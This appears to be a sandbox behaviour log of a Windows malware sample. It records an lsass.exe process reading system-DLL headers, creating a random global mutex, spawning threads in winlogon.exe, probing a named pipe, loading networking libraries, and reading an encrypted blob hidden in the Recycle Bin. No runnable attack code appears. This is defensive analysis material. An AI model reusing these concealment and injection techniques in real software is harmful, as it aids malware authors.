File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019947608
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947794
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019947914
System info queried Type: BasicInformation success or wait 2019948200
System info queried Type: ProcessorInformation success or wait 2019948304
System info queried Type: BasicInformation success or wait 2019949229
System info queried Type: ProcessorInformation success or wait 2019949331
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019949479
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019949785
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019949878
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950018
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019950110
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019950218
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950431
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019950558
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019950747
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019950867
System info queried Type: BasicInformation success or wait 2019951150
System info queried Type: ProcessorInformation success or wait 2019951255
System info queried Type: BasicInformation success or wait 2019952206
System info queried Type: ProcessorInformation success or wait 2019952308
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019952455
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019952762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019952856
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019952995
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019953087
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019953196
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019953409
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019953501
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019953688
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019953808
System info queried Type: BasicInformation success or wait 2019954091
System info queried Type: ProcessorInformation success or wait 2019954197
System info queried Type: BasicInformation success or wait 2019955139
System info queried Type: ProcessorInformation success or wait 2019955241
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019955386
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019955694
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019955788
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019956530
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019956624
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2019956735
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019956948
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2019957040
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2019957226
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2019957347
System info queried Type: BasicInformation success or wait 2019958378
System info queried Type: ProcessorInformation success or wait 2019958489
System info queried Type: BasicInformation success or wait 2019959786
System info queried Type: ProcessorInformation success or wait 2019959889
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019960034
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019960347
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019960441
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961246
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019961337
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2019961448
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961660
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2019961753
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2019961940
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2019962060
System info queried Type: BasicInformation success or wait 2019963052
System info queried Type: ProcessorInformation success or wait 2019963164
System info queried Type: BasicInformation success or wait 2019964686
System info queried Type: ProcessorInformation success or wait 2019964792
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019964937
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019965251
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2019965345
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966103
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019966197
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2019966307
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966520
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2019966613
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2019966798
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2019966917
System info queried Type: BasicInformation success or wait 2019967854
System info queried Type: ProcessorInformation success or wait 2019967911
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM success or wait 2019969345
System info queried Type: CurrentTimeZoneInformation success or wait 2019969498
Thread created PID: 636 TID: 2448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019970328
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2019971297
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A40000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2019971618
Thread created PID: 636 TID: 2436 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019972094
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019974288
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2019981398
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2019983145
System info queried Type: BasicInformation success or wait 2019989591
System info queried Type: ProcessorInformation success or wait 2019989729
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2019990070
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2019990302
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2019990829
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019994923
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: A60000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2020003638
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2020033908
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2020060345
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2020060918
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2020083202
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2020085509
Thread delayed Time: 0 TID: 8786 success or wait 2021390051
Thread delayed Time: 0 TID: 8786 success or wait 2021390517
Thread delayed Time: 0 TID: 8786 success or wait 2021390885
System info queried Type: BasicInformation success or wait 2021393589
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2021395060
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2021395598
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021424635
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021424951
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021428410
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021428724
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021429777
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021430335
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2021464144
Thread delayed Time: 0 TID: 8786 success or wait 2029172024
Thread delayed Time: 0 TID: 8786 success or wait 2029172273
Thread delayed Time: 0 TID: 8786 success or wait 2029172415
Thread delayed Time: 0 TID: 8786 success or wait 2030280956
Thread delayed Time: 0 TID: 8786 success or wait 2030281109
Thread delayed Time: 0 TID: 8786 success or wait 2030281256
Thread delayed Time: 0 TID: 8786 success or wait 2031392931
Thread delayed Time: 0 TID: 8786 success or wait 2031393352
Thread delayed Time: 0 TID: 8786 success or wait 2031393768
Thread delayed Time: 0 TID: 8786 success or wait 2033442951
Thread delayed Time: 0 TID: 8786 success or wait 2033459531
Thread delayed Time: 0 TID: 8786 success or wait 2033512601
Thread delayed Time: 0 TID: 8786 success or wait 2035755150
Thread delayed Time: 0 TID: 8786 success or wait 2035755781
Thread delayed Time: 0 TID: 8786 success or wait 2035756210
Thread delayed Time: 0 TID: 8786 success or wait 2036874447
Thread delayed Time: 0 TID: 8786 success or wait 2036875208
Thread delayed Time: 0 TID: 8786 success or wait 2036875705
Thread delayed Time: 0 TID: 8786 success or wait 2038031819
Thread delayed Time: 0 TID: 8786 success or wait 2038033468
Thread delayed Time: 0 TID: 8786 success or wait 2038034870
Thread delayed Time: 0 TID: 8786 success or wait 2041020645
Thread delayed Time: 0 TID: 8786 success or wait 2041022731
Thread delayed Time: 0 TID: 8786 success or wait 2041024426
Thread delayed Time: 0 TID: 8786 success or wait 2042279691
Thread delayed Time: 0 TID: 8786 success or wait 2042280874
Thread delayed Time: 0 TID: 8786 success or wait 2042303321
Thread delayed Time: 0 TID: 8786 success or wait 2046819755
Thread delayed Time: 0 TID: 8786 success or wait 2046820944
Thread delayed Time: 0 TID: 8786 success or wait 2046821593
Thread delayed Time: 0 TID: 8786 success or wait 2048439700
Thread delayed Time: 0 TID: 8786 success or wait 2048440900
Thread delayed Time: 0 TID: 8786 success or wait 2048442056
Thread delayed Time: 0 TID: 8786 success or wait 2049930080
Thread delayed Time: 0 TID: 8786 success or wait 2049930890
Thread delayed Time: 0 TID: 8786 success or wait 2049931538
Thread delayed Time: 0 TID: 8786 success or wait 2051535985
Thread delayed Time: 0 TID: 8786 success or wait 2051538442
Thread delayed Time: 0 TID: 8786 success or wait 2051539876
Thread delayed Time: 0 TID: 8786 success or wait 2052646623
Thread delayed Time: 0 TID: 8786 success or wait 2052648307
Thread delayed Time: 0 TID: 8786 success or wait 2052650144
Thread delayed Time: 0 TID: 8786 success or wait 2053766353
Thread delayed Time: 0 TID: 8786 success or wait 2053768184
Thread created PID: 636 TID: 2568 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2127654508
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2127664280
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2127666083
Thread created PID: 636 TID: 1388 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2236412106
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 1620000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236412384
Thread created PID: 636 TID: 284 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2236413176
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2236420889
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 1620000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236421525
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236437545
Thread created PID: 636 TID: 3500 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2344828856
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2344832693
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2344834523
Analysis File: lsass.exe PID: 692 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:05
Start date: 01/12/2011
Path: C:\WINDOWS\system32\lsass.exe
Commandline: C:\WINDOWS\system32\lsass.exe
Imagebase: 0x1000000
File size: 13312 bytes
MD5 hash: BF2466B3E18E970D8A976FB95FC1CA85
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 4 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
